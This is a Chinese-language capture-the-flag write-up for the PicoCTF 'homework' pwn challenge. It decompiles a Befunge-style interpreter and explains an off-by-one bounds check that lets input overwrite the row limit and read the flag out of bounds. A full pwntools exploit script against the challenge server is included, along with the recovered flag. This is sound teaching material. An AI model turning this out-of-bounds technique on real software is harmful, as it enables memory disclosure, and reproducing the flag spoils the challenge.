[Pico CTF] pwn-homework writeup:一次有趣虚拟化分析之旅

selph
selph
发布于 2024-09-05 / 15 阅读
0
0

[Pico CTF] pwn-homework writeup:一次有趣虚拟化分析之旅

原文出处:先知社区(若*风):《PicoCTF homework wp:一次有趣代码虚拟化分析之旅》:https://xz.aliyun.com/t/15354?time__1311=GqjxnD2DyGGQitD%2FD0eH%3Di%3DBgciDuGOoD

前言

时隔多日的又一次虚拟化代码分析之旅,很有趣的一道题,这里的难度不在漏洞利用上,而在于如何找到漏洞

本文详细记录分析利用过程分享给大家~

题目情况

题目描述:"time to do some homework!"

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

逆向分析

main:

int __fastcall main(int argc, const char **argv, const char **envp)
{
  int i; // [rsp+4h] [rbp-Ch]
  FILE *stream; // [rsp+8h] [rbp-8h]

  setvbuf(stdout, 0LL, 2, 0LL);
  stream = fopen("flag.txt", "r");
  __isoc99_fscanf(stream, "%s", &flag);         // 保存到全局变量里
  fclose(stream);
  puts("Enter homework sol");
  rows = 50;
  cols = 22;
  for ( i = 0; i <= 3 && fgets(&board[22 * i], cols + 1, stdin) && board[22 * i] != 'R'; ++i )
    board[22 * i - 1 + strlen(&board[22 * i])] = 0;// 输入R开头的4个字符串
  while ( (unsigned int)step() )
    ;
  do_you_like_gittens = 1;
  does_gittens_watch_cat_videos = 1;
  return 0;
}

主要是2个循环:

第一个循环接收输入到board全局变量中,最多接收4组输入

第二个循环执行step函数

step:

__int64 step()
{
  int v1; // eax

  switch ( board[22 * pcy + pcx] )              // pcx pcy是坐标
                                                // 22列
  {
    case '!':
      if ( sn <= 0 )
        __assert_fail("sn >= 1", "homework.c", 0x35u, "step");
      stack[sn - 1] = stack[sn - 1] == 0;
      goto LABEL_76;
    case '$':
      if ( sn <= 0 )
        __assert_fail("sn >= 1", "homework.c", 0x64u, "step");
      --sn;
      goto LABEL_76;
    case '%':
      if ( sn <= 1 )
        __assert_fail("sn >= 2", "homework.c", 0x30u, "step");
      stack[sn - 2] %= stack[sn - 1];
      --sn;
      goto LABEL_76;
    case '*':
      if ( sn <= 1 )
        __assert_fail("sn >= 2", "homework.c", 0x26u, "step");
      stack[sn - 2] *= stack[sn - 1];
      --sn;
      goto LABEL_76;
    case '+':
      if ( sn <= 1 )
        __assert_fail("sn >= 2", "homework.c", 0x1Cu, "step");
      stack[sn - 2] += stack[sn - 1];
      --sn;
      goto LABEL_76;
    case ',':
      if ( sn <= 0 )
        __assert_fail("sn >= 1", "homework.c", 0x6Du, "step");
      putchar(stack[--sn]);
      goto LABEL_76;
    case '-':
      if ( sn <= 1 )
        __assert_fail("sn >= 2", "homework.c", 0x21u, "step");
      stack[sn - 2] -= stack[sn - 1];
      --sn;
      goto LABEL_76;
    case '.':
      if ( sn <= 0 )
        __assert_fail("sn >= 1", "homework.c", 0x68u, "step");
      printf("%d", (unsigned int)stack[--sn]);
      goto LABEL_76;
    case '/':
      if ( sn <= 1 )
        __assert_fail("sn >= 2", "homework.c", 0x2Bu, "step");
      stack[sn - 2] /= stack[sn - 1];
      --sn;
      goto LABEL_76;
    case ':':
      if ( sn <= 0 )
        __assert_fail("sn >=1", "homework.c", 0x59u, "step");
      stack[sn] = stack[sn - 1];
      ++sn;
      goto LABEL_76;
    case '<':
      dirx = -1;
      diry = 0;
      goto LABEL_76;
    case '>':
      dirx = 1;
      diry = 0;
      goto LABEL_76;
    case '@':
      return 0LL;                               // 退出循环的条件
    case '\\':
      if ( sn <= 1 )
        __assert_fail("sn >=2", "homework.c", 0x5Eu, "step");
      stack[sn - 1] ^= stack[sn - 2];
      stack[sn - 2] ^= stack[sn - 1];
      stack[sn - 1] ^= stack[sn - 2];
      goto LABEL_76;
    case '^':
      dirx = 0;
      diry = -1;
      goto LABEL_76;
    case '_':
      if ( sn <= 0 )
        __assert_fail("sn >= 1", "homework.c", 0x4Du, "step");
      if ( stack[--sn] )
        dirx = -1;
      else
        dirx = 1;
      diry = 0;
      goto LABEL_76;
    case '`':
      if ( sn <= 1 )
        __assert_fail("sn >= 2", "homework.c", 0x39u, "step");
      stack[sn - 2] = stack[sn - 2] > stack[sn - 1];
      goto LABEL_76;
    case 'g':
      if ( sn <= 1 )
        __assert_fail("sn >= 2", "homework.c", 0x72u, "step");
      if ( stack[sn - 2] < 0 || stack[sn - 1] < 0 )
        __assert_fail("stack[sn-2] >= 0 && stack[sn-1] >= 0", "homework.c", 0x73u, "step");
      if ( stack[sn - 1] > rows || stack[sn - 2] > cols )
        __assert_fail("stack[sn-1] <= rows && stack[sn-2] <= cols", "homework.c", 0x74u, "step");
      stack[sn - 2] = board[22 * stack[sn - 1] + stack[sn - 2]];
      --sn;
      goto LABEL_76;
    case 'p':
      if ( sn <= 2 )
        __assert_fail("sn >= 3", "homework.c", 0x79u, "step");
      if ( stack[sn - 2] < 0 || stack[sn - 1] < 0 )
        __assert_fail("stack[sn-2] >= 0 && stack[sn-1] >= 0", "homework.c", 0x7Au, "step");
      if ( stack[sn - 1] > rows || stack[sn - 2] > cols )
        __assert_fail("stack[sn-1] <= rows && stack[sn-2] <= cols", "homework.c", 0x7Bu, "step");
      board[22 * stack[sn - 1] + stack[sn - 2]] = stack[sn - 3];
      sn -= 3;
      goto LABEL_76;
    case 'v':
      dirx = 0;
      diry = 1;
      goto LABEL_76;
    case '|':
      if ( sn <= 0 )
        __assert_fail("sn >= 1", "homework.c", 0x53u, "step");
      if ( stack[--sn] )
      {
        dirx = 0;
        diry = -1;
      }
      else
      {
        dirx = 0;
        diry = 1;
      }
      goto LABEL_76;
    default:
      if ( board[22 * pcy + pcx] == 48 )
      {
        if ( sn > 99 )
          __assert_fail("sn < 100", "homework.c", 0x81u, "step");
        v1 = sn++;
        stack[v1] = 0;
      }
LABEL_76:
      pcx += cols + dirx;
      pcx %= cols;
      pcy += rows + diry;
      pcy %= rows;
      return 1LL;
  }
}

step函数是一个switch-case结构,条件是board[22 * pcy + pcx]​,这里pcx,pcy也是全局变量

可以认为这是一个二维数组,是一个矩阵,一行22个元素,共有50列

第一次进来的时候pcx和pcy还没有被赋值,初始值应该是0,dirx的初始值是1,diry初始值是0

在switch-case结束的时候对这两个进行赋值

      pcx += cols + dirx;
      pcx %= cols;
      pcy += rows + diry;
      pcy %= rows;

pcx取决于dirx的值,pcy取决于diry的值,dirx和diry的值在switch-case被赋值

接下来分析一下switch-case的作用:

根据不同条件操作stack全局变量数组和sn全局变量,整理一下操作得到:

// 移动当前指针,pop,push
$	:	sn--;
0	:	stack[++sn]=0;

// 算数运算
!	:	stack[sn-1]  = stack[sn-1] == 0;
%	:	stack[sn-2] %= stack[sn-1]; sn--;
*	:	stack[sn-2] *= stack[sn-1]; sn--;
+	:	stack[sn-2] += stack[sn-1]; sn--;
-	:	stack[sn-2] -= stack[sn-1]; sn--;
/	:	stack[sn-2] /= stack[sn-1]; sn--;
:	:	stack[sn] 	 = stack[sn-1];	sn++;
\	:	swap(stack[sn-1],stack[sn-2]);

// 输出
,	:	putchar(stack[--sn]);
.	:	printf("%d",stack[--sn]);

// 移动控制符
<	:	dirx=-1;	diry= 0;
>	:	dirx= 1;	diry= 0;
^	:	dirx= 0; 	diry=-1;
v	:	dirx= 0; 	diry= 1;
_	:	if(stack[--sn])dirx=-1;dirx=1;diry=0;
|	:	if(stack[--sn])diry=-1;diry=1;dirx=0;

// 退出
@	:	return 0;

// 取值
g	:	stack[sn-2] = board[22 * stack[sn-1] + stack[sn-2]];sn--;

// 赋值
p	:	board[22 * stack[sn-1] + stack[sn-2]] = stack[sn-3];sn-=3;

利用分析

这个程序分析完了,代码虚拟化,自己输入虚拟指令,然后程序解释执行虚拟指令,虚拟操作可以做的事情是:

  1. 计算数值
  2. 输出数值

回顾一下程序的开头,程序将flag读入全局变量,查看一下全局变量的布局:

.bss:0000000000005099                 align 20h
.bss:00000000000050A0                 public sn
.bss:00000000000050A0 sn              dd ?                    ; DATA XREF: step:loc_123E↑r
.bss:00000000000050A0                                         ; step:loc_1268↑r ...
.bss:00000000000050A4                 align 20h
.bss:00000000000050C0                 public stack
.bss:00000000000050C0 ; int stack[104]
.bss:00000000000050C0 stack           dd 68h dup(?)           ; DATA XREF: step+B2↑o
.bss:00000000000050C0                                         ; step+CF↑o ...
.bss:0000000000005260                 public board
.bss:0000000000005260 ; char board[1100]
.bss:0000000000005260 board           db 44Ch dup(?)          ; DATA XREF: step+2D↑o
.bss:0000000000005260                                         ; step+9F0↑o ...
.bss:00000000000056AC                 public rows
.bss:00000000000056AC rows            dd ?                    ; DATA XREF: step+948↑r
.bss:00000000000056AC                                         ; step+ADA↑r ...
.bss:00000000000056B0                 public cols
.bss:00000000000056B0 cols            dd ?                    ; DATA XREF: step+96F↑r
.bss:00000000000056B0                                         ; step+B01↑r ...
.bss:00000000000056B4                 public diry
.bss:00000000000056B4 diry            dd ?                    ; DATA XREF: step+482↑w
.bss:00000000000056B4                                         ; step+49B↑w ...
.bss:00000000000056B8                 public pcx
.bss:00000000000056B8 pcx             dd ?                    ; DATA XREF: step+A↑r
.bss:00000000000056B8                                         ; step+BC7↑r ...
.bss:00000000000056BC                 public pcy
.bss:00000000000056BC pcy             dd ?                    ; DATA XREF: step+4↑r
.bss:00000000000056BC                                         ; step:def_1232↑r ...
.bss:00000000000056C0                 public do_you_like_gittens
.bss:00000000000056C0 do_you_like_gittens dd ?                ; DATA XREF: main+175↑w
.bss:00000000000056C4                 public does_gittens_watch_cat_videos
.bss:00000000000056C4 does_gittens_watch_cat_videos dd ?      ; DATA XREF: main+17F↑w
.bss:00000000000056C8                 align 20h
.bss:00000000000056E0                 public flag
.bss:00000000000056E0 flag            db    ? ;               ; DATA XREF: main+41↑o
.bss:00000000000056E1                 db    ? ;
.bss:00000000000056E2                 db    ? ;
.bss:00000000000056E3                 db    ? ;
.bss:00000000000056E4                 db    ? ;

代码里有边界限制,没法通过sn向上突破stack边界

这里board距离flag最近,board的值可以赋值到stack里,且取值索引来自stack,可控,存在越下界读取flag的可能

以及stack的值可以被打印出来

泄露flag的思路如下:

  1. 输入可访问flag的索引到stack中
  2. 读取flag的字符到stack
  3. 打印flag出来

接下来进一步分析虚拟指令的用法,因为dirx的初始值是1,所以每次执行完当前指令后,都会去执行下一个指令,例如:0@​则是sn++之后就退出

按照这个模式去完成这个目标:

从board读取一个字节并打印的操作如下图:

image

00抬高stack,!赋值1,g从下一行的第0个来读取字节到sn-2

然后打印该字符:

image

测试:

image

成功输出指定索引的字符

计算偏移,flag开头在:52行8列

当我试图使用g指令从52行8列读取的时候,我发现我忽视了一个校验条件:

    case 'g':
      if ( sn <= 1 )
        __assert_fail("sn >= 2", "homework.c", 0x72u, "step");
      if ( stack[sn - 2] < 0 || stack[sn - 1] < 0 )
        __assert_fail("stack[sn-2] >= 0 && stack[sn-1] >= 0", "homework.c", 0x73u, "step");
      if ( stack[sn - 1] > rows || stack[sn - 2] > cols )
        __assert_fail("stack[sn-1] <= rows && stack[sn-2] <= cols", "homework.c", 0x74u, "step");

这里存在边界条件,rows=50,然而数组下标是从0开始的,意味着第50行是越界的,是可以绕过条件进行读取的,测试一下读取rows:

ru(b"Enter homework sol\n")
sl(b"00!g0!0!gg,@")
sl(b"\x00\x32")
sl(b"R")
ia()
[DEBUG] Received 0x13 bytes:
    b'Enter homework sol\n'
[DEBUG] Sent 0xd bytes:
    b'00!g0!0!gg,@\n'
[DEBUG] Sent 0x3 bytes:
    00000000  00 32 0a                                            │·2·│
    00000003
[DEBUG] Sent 0x2 bytes:
    b'R\n'
[*] Switching to interactive mode
[*] Process '/mnt/d/Misc/CTF/CTF-练习/PicoCTF_/homework/homework' stopped with exit code 0 (pid 91941)
[DEBUG] Received 0x1 bytes:
    b'2'

拿到了结果:2,2的ascii是0x32,换成十进制就是50,rows可读

那么现在在完成之前的计划之前需要先修改rows为一个很大的值,poc:

# edit rows and read
ru(b"Enter homework sol\n")
sl(b"00!g00!0!gp00!0!gg,@")
sl(b"\xff\x32")
sl(b"R")
ia()
[DEBUG] Received 0x13 bytes:
    b'Enter homework sol\n'
[DEBUG] Sent 0x15 bytes:
    b'00!g00!0!gp00!0!gg,@\n'
[DEBUG] Sent 0x3 bytes:
    00000000  ff 32 0a                                            │·2·│
    00000003
[DEBUG] Sent 0x2 bytes:
    b'R\n'
[*] Switching to interactive mode
[*] Process '/mnt/d/Misc/CTF/CTF-练习/PicoCTF_/homework/homework' stopped with exit code 0 (pid 97480)
[DEBUG] Received 0x1 bytes:
    b'\xff'
\xff[*] Got EOF while reading in interactive

成功设置rows的值为0xff,并打印出来验证了

最后那就设置完之后去读取flag的1个字节,poc:

"""
00!g00!0!gp0!:+0!gv
xxxx @,gg!0+!0+:!0<
"""
ru(b"Enter homework sol\n")
sl(b"00!g00!0!gp0!:+0!gv")
sl(b"\xff\x32\x08\x34" + b" " + b"@,gg!0+!0+:!0<")
sl(b"R")
ia()
[*] INFO  connect mars.picoctf.net port 31689 success!
[DEBUG] Received 0x13 bytes:
    b'Enter homework sol\n'
[DEBUG] Sent 0x14 bytes:
    b'00!g00!0!gp0!:+0!gv\n'
[DEBUG] Sent 0x14 bytes:
    00000000  ff 32 08 34  20 40 2c 67  67 21 30 2b  21 30 2b 3a  │·2·4│ @,g│g!0+│!0+:│
    00000010  21 30 3c 0a                                         │!0<·│
    00000014
[DEBUG] Sent 0x2 bytes:
    b'R\n'
[*] Switching to interactive mode
[DEBUG] Received 0x1 bytes:
    b'p'

成功拿到,这里是通过读取board中的数据到stack中变成索引来使用的,而非在stack计算出索引来用

所以可以通过修改索引多次执行,拿到flag的每一位

完整exp

exp:通过修改row为巨大值,来越界读取flag

from pwn import *
context.log_level = "warn"
res = b""
io = remote("mars.picoctf.net", 31689)
for y in range(52,55):
    for i in range(0,24):
        io = remote("mars.picoctf.net", 31689)
        io.recvuntil(b"Enter homework sol\n")
        io.sendline(b"00!g00!0!gp0!:+0!gv")
        io.sendline(b"\xff\x32"+bytes([i,y]) + b" " + b"@,gg!0+!0+:!0<")
        io.sendline(b"R")

        tmp = io.clean(5)
        if b"run" in tmp or b"\x00" in tmp:
            io.close()
            continue
        if tmp == b"":
            tmp = b"?"
        res += tmp
        print(res)
        io.close()
b'p'
b'pi'
b'pi?'
b'pi?o'
b'pi?oC'
b'pi?oCT'
b'pi?oCTF'
b'pi?oCTF{'
b'pi?oCTF{g'
b'pi?oCTF{go'
b'pi?oCTF{goo'
b'pi?oCTF{good'
b'pi?oCTF{good_'
b'pi?oCTF{good_j'
b'pi?oCTF{good_jo'
b'pi?oCTF{good_job'
b'pi?oCTF{good_job_'
b'pi?oCTF{good_job_f'
b'pi?oCTF{good_job_fu'
b'pi?oCTF{good_job_ful'
b'pi?oCTF{good_job_full'
b'pi?oCTF{good_job_full_'
b'pi?oCTF{good_job_full_s'
b'pi?oCTF{good_job_full_sc'
b'pi?oCTF{good_job_full_sc?'
b'pi?oCTF{good_job_full_sc?r'
b'pi?oCTF{good_job_full_sc?re'
b'pi?oCTF{good_job_full_sc?re_'
b'pi?oCTF{good_job_full_sc?re_X'
b'pi?oCTF{good_job_full_sc?re_X7'
b'pi?oCTF{good_job_full_sc?re_X7O'
b'pi?oCTF{good_job_full_sc?re_X7OI'
b'pi?oCTF{good_job_full_sc?re_X7OIj'
b'pi?oCTF{good_job_full_sc?re_X7OIj4'
b'pi?oCTF{good_job_full_sc?re_X7OIj4H'
b'pi?oCTF{good_job_full_sc?re_X7OIj4HI'
b'pi?oCTF{good_job_full_sc?re_X7OIj4HI9'
b'pi?oCTF{good_job_full_sc?re_X7OIj4HI90'
b'pi?oCTF{good_job_full_sc?re_X7OIj4HI903'
b'pi?oCTF{good_job_full_sc?re_X7OIj4HI903R'
b'pi?oCTF{good_job_full_sc?re_X7OIj4HI903RG'
b'pi?oCTF{good_job_full_sc?re_X7OIj4HI903RG2'
b'pi?oCTF{good_job_full_sc?re_X7OIj4HI903RG2Y'
b'pi?oCTF{good_job_full_sc?re_X7OIj4HI903RG2YO'
b'pi?oCTF{good_job_full_sc?re_X7OIj4HI903RG2YO}'

得到的结果丢失了2个字符没读取到,但是根据单词含义可以猜到前面是c,后面是o:picoCTF{good_job_full_score_X7OIj4HI903RG2YO}

但是为什么会丢2个字符呢?

因为在输入的时候,c所在是索引是10,十六进制0a,ascii对应\n,相当于在这里换行了,导致程序获取的输入就是错误的,以至于程序崩溃了

对于o所在的索引是下一行的10

单独写exp为这两个字符:

io = remote("mars.picoctf.net", 31689)

io.recvuntil(b"Enter homework sol\n")
io.sendline(b"00!g00!0!gp0!:+0!gv")
io.sendline(b"\xff\x32\x09\x34" + b" "*10 + b"v+!0<")
io.sendline(b" @,gg!0+!0+:!0<")
io.sendline(b"R")
io.interactive()
c
io = remote("mars.picoctf.net", 31689)

io.recvuntil(b"Enter homework sol\n")
io.sendline(b"00!g00!0!gp0!:+0!gv")
io.sendline(b"\xff\x32\x09\x35" + b" "*10 + b"v+!0<")
io.sendline(b" @,gg!0+!0+:!0<")
io.sendline(b"R")
io.interactive()
o

总结

代码虚拟化程序,数组越界问题,一个收获就是下次遇到大数组要优先考虑边界条件!!!!

网上找到2个wp,根据参考资料[1],才了解到,这个东西本质上是Befunge - Esolang (esolangs.org)这个解释语言

参考资料[1]是通过基于befunge语言的条件和循环完成数据的泄露,这种方法很复杂,但是一口气就能拿到flag

参考资料[0]和我的方法类似

参考资料


评论